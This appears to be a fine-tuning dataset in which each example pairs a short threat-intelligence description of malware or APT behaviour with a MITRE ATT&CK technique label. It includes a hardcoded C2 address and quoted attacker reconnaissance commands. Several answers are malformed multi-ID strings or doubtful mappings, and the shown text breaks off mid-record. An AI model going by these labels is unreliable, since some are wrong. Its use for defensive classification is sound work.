- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used the Stealer One credential stealer to target web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscates internal strings and unpacks them at startup."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NBTscan can list NetBIOS computer names."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group tools have registered Run keys in the registry to give malicious VBS files persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has used VBScript to call wscript to execute a PowerShell command."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since 2020, Proofpoint researchers have observed TA416, an actor assessed to be aligned with the Chinese state, utilizing web bugs to profile their targets. Commonly referred to as tracking pixels, web bugs embed a hyperlinked non-visible object within the body of an email that, when enabled, will attempt to retrieve a benign image file from an actor-controlled server. This provides a “sign of life” to threat actors and indicates that the targeted account is valid with the user being inclined to open emails that utilize social engineering content. TA416 has been using web bugs to target victims prior to delivering malicious URLs that have installed a variety of PlugX malware payloads"
- },
- {
- "role": "assistant",
- "content": "T1608 - Stage Capabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt has the capability to identify the drive type on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers then created scheduled tasks that would launch the ransomware with names based on variants of Windows Update Security or Windows Update Security Patches"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEL-TEMP Deletes all files in the “AppData/Local/Temp” path"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can create backdoor accounts with the login \"HelpAssistant\" with the Limbo module."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORESHELL can communicate over HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can get user agent strings for the default browser from \"HKCU\\Software\\Classes\\http\\shell\\open\\command\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"Get-ProcessTokenPrivilege\" Privesc-PowerUp module can enumerate privileges for a given process."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filename: impku.dat:schemas File size: 608854 bytes MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892 SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90 Notes: Alternate data stream (ADS) PNG file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA"
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used attempted to lure victims into opening malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding “WindowsApps"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware Capabilities WINDSHIELD Command and control (C2) communications via TCP raw sockets Four configured C2s and six configured ports – randomly-chosen C2/port for communications Registry manipulation Get the current module's file name Gather system information including registry values, user name, computer name, and current code page File system interaction including directory creation, file deletion, reading, and writing files Load additional modules and execute code Terminate processes Anti-disassembly KOMPROGO Fully-featured backdoor capable of process, file, and registry management Creating a reverse shell File transfers Running WMI queries Retrieving information about the infected system SOUNDBITE C2 communications via DNS Process creation File upload Shell command execution File and directory enumeration/manipulation Window enumeration Registry manipulation System information gathering PHOREAL C2 communications via ICMP Reverse shell creation Filesystem manipulation Registry manipulation Process creation File upload BEACON (Cobalt Strike) Publicly available payload that can inject and execute arbitrary code into processes Impersonating the security context of users Importing Kerberos tickets Uploading and downloading files Executing shell commands Configured with malleable C2 profiles to blend in with normal network traffic Co-deployment and interoperability with Metasploit framework SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB Table 3: APT32 Malware and Capabilities APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Linux has used HTTP in outbound communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) with the following commands (esentutil.exe is also a legitimate program that is pre-installed in Windows"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy’s main payload contains its back door functionality, allowing the threat to carry out the following activities: Log keystrokes and the titles of open windows Gather clipboard data and system information Steal printer information and any documents that were sent to be printed Record audio Capture screenshots and webcam photos Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker’s C&C servers"
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server \"195.62.52.93\" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1041 - Exfiltration Over C2 Channel', 'T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches victim drives for files matching certain extensions (“.skr”,“.pkr” or “.key”) or names."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has used the command `timeout 20` to pause the execution of its initial loader."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has executed commands via cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can iterate over the running processes to find a suitable injection target."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LaZagne can obtain credential information from /etc/shadow using the shadow.py module."
- },
- {
- "role": "assistant",
- "content": "T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. This version of mimikatz did not require any command line arguments, most likely in an attempt to avoid detection based on command-line auditing. The dumped hashes were used to authenticate to other machines via pass the hash"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of loading executable code via process hollowing."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 executes shellcode and a VBA script to decode Base64 strings."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can load and call DLL functions."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode is not encrypted but is obfuscated"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon decrypts task and configuration files for execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors registered hundreds of domains using Duck DNS and DNS Exit."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. APT32 executed shellcode to identify the name of the infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If nothing like that is detected, the malware will decrypt the third stage and execute it by using the process hollowing technique, commonly used by malware authors. In this version, the payloads are encrypted with the same XOR-based algorithm as the one used in previous versions, however in this latest version, the payload is encrypted twice, with different keys"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can send time zone information from a compromised host to C2."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can enumerate routine network connections from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. Afterwards, the installer malware creates a downloader and a configuration file from its resource and executes it. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The x command treats the supplied data as a PowerShell script that it will write to the current PowerShell script (Office365DCOMCheck.ps1/SystemDiskClean.ps1), effectively overwriting the initial PowerShell script with a secondary payload script"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT has used DLL side-loading to load malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some InnaputRAT variants create a new Windows service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie', 'T1113 - Screen Capture', 'T1550.004 - Web Session Cookie', 'T1020.001 - Traffic Duplication', 'T1056.003 - Web Portal Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based on comparison of versions, made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The campaign commences via a SPAM email containing a malicious new URL being sent to potential victims. The URL landing page presents the recipient with a password for a ZIP file."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can communicate with C2 over TCP and UDP."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can collect the local hostname, operating system details, CPU speed, and total physical memory."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has searched for unsecured SSH keys."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been used to decode binaries hidden inside certificate files as Base64 information."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All of the backdoors identified – excluding RoyalDNS – required APT15 to create batch scripts in order to install its persistence mechanism. This was achieved through the use of a simple Windows run key"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RGDoor decodes Base64 strings and decrypts strings using a custom XOR algorithm."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file: \"C:\\Windows\\system32\\cmd.exe\" /C systeminfo >> \"C:\\Ahnlab\\$$$A24F.TMP\" \"C:\\WINDOWS\\system32\\cmd.exe\" /C tasklist /v >> \"C:\\Ahnlab\\$$$A24F.TMP\" NavRAT Capabilities NavRAT is a remote access trojan (RAT) designed to upload, download and execute files"
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication"
- },
- {
- "role": "assistant",
- "content": "T1098.004 - SSH Authorized Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Process injection helps the malware avoid detection; however, review of active network connections show notepad.exe communicating to 185"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
